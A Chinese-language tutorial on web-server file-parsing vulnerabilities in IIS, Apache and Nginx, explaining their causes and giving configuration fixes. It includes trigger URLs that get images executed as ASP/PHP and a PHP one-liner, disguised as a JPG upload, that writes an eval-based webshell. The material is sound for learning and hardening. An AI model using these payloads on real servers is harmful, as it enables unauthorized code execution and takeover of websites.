[TOC] ## web中間件解析漏洞 常見的web中間為IIS,NGING,APACHE三個 ### 一、IIS5.x-6.x解析漏洞： 使用iis5.x-6.x版本的服務器，大多為windows server 2003，網站比較古老，開發語句一般為asp；該解析漏洞也只能解析asp文件，而不能解析aspx文件。 #### 漏洞簡介 1. 目錄解析(6.0) 形式：www.xxx.com/xx.asp/xx.jpg 原理：服務器默認會把.asp，.asa目錄下的文件都解析成asp文件。 2. 文件解析 形式：www.xxx.com/xx.asp;.jpg 原理：服務器默認不解析;號后面的內容，因此xx.asp;.jpg便被解析成asp文件了。 3. 解析文件類型 IIS6.0默認的可執行文件除了asp還包含這三種 :/test.asa、/test.cer、/test.cdx #### 修復方案 1. 無微軟官方的補丁，可自己編寫正則，阻止上傳xx.asp;.jpg類型的文件名。 2. 做好權限設置，限制用戶創建文件夾** ### 二、IIS7.5解析漏洞： 漏洞的出現幾率相當小 漏洞原理： IIS7.5的漏洞與nginx的類似，都是由于php配置文件中，開啟了`cgi.fix_pathinfo`，而這并不是nginx或者iis7.5本身的漏洞。 > 開啟IIS功能可以參考：https://www.xp.cn/a.php/182.html 當安裝完成后，php.ini里如果默認`cgi.fix_pathinfo=1`，就會將后綴名為.php的路徑當做php文件進行解析。 ```url #原url http://x.x.x.x/upload/webshell.jpg #改造后 http://x.x.x.x/upload/webshell.jpg/.php ``` ### 三、apache解析漏洞： #### 漏洞簡介 1. 漏洞原理： Apache解析文件的規則是從右到左開始判斷解析,如果后綴名為不可識別文件解析,就再往左判斷。 比如`test.php.owf.rar`,“.owf”和”.rar” 這兩種后綴是apache不可識別解析,apache就會把oldboy.php.owf.rar解析成php。 2. 漏洞形式 www.xxxx.xxx.com/test.php.php123 3. 其余配置問題導致漏洞 （1）如果配置有`AddHandler php5-script .php`，這時只要文件名里包含.php，如test2.php.jpg，也會以php來執行。 （2）如果配置有`AddType application/x-httpd-php .jpg` 即使擴展名是.jpg，一樣能以 php 方式執行。 #### 修復方案： 1. apache配置文件，禁止.php這樣的文件執行 ```cmd <Files ~ “.(php.|php3.)”> ????????Order Allow,Deny ????????Deny from all </Files> ``` 2. 用偽靜態重寫類似.php.\*這類文件， 在httpd.conf找到`LoadModule rewrite_module modules/mod_rewrite.so`,把注釋去掉 重啟apache,在網站根目錄建立.htaccess文件,代碼如下: ``` <IfModule mod_rewrite.c> RewriteEngine On RewriteRule .(php.|php3.) /index.php RewriteRule .(pHp.|pHp3.) /index.php RewriteRule .(phP.|phP3.) /index.php RewriteRule .(Php.|Php3.) /index.php RewriteRule .(PHp.|PHp3.) /index.php RewriteRule .(PhP.|PhP3.) /index.php RewriteRule .(pHP.|pHP3.) /index.php RewriteRule .(PHP.|PHP3.) /index.php </IfModule> ``` ### 四、nginx解析漏洞： #### 漏洞簡介 1. 漏洞原理： Nginx默認是以 CGI 的方式支持 PHP 解析的，普遍的做法是在 Nginx 配置文件中通過正則匹配設置`SCRIPT_FILENAME`,然后將`SCRIPT_FILENAME`傳遞給 PHP CGI 假如有url：www.xx.com/phpinfo.jpg/1.php，匹配到的SCRIPT_FILENAME應該是1.php，如果開啟了`fix_pathinfo`參數，那么就會觸發在 PHP中的如下邏輯： PHP認為`SCRIPT_FILENAME`是phpinfo.jpg，而1.php是`PATH_INFO`，所以就會將phpinfo.jpg作為 PHP 文件來解析了。 2. 漏洞形式： ```url www.xxxx.com/UploadFiles/image/1.jpg/1.php www.xxxx.com/UploadFiles/image/1.jpg%00.php www.xxxx.com/UploadFiles/image/1.jpg/%20\\0.php xxx.jpg%00.php (Nginx <8.03空字節代碼執行漏洞) ``` 3. 另外一種手法： 上傳一個名字為test.jpg，以下內容的文件。 ```php <?PHP fputs(fopen('shell.php','w'),'<?php eval($\_POST\[cmd\])?>');?> ``` 然后訪問/test.jpg/.php,在這個目錄下就會生成一句話木馬shell.php #### 修復方案 1. 修改php.ini文件，將`cgi.fix_pathinfo`的值設置為0; 2. 在Nginx配置文件中添加以下代碼： ``` if?( $fastcgi_script_name?~ ..*/.*php ) { return?403; } ``` 這行代碼的意思是當匹配到類似test.jpg/a.php的URL時，將返回403錯誤代碼。**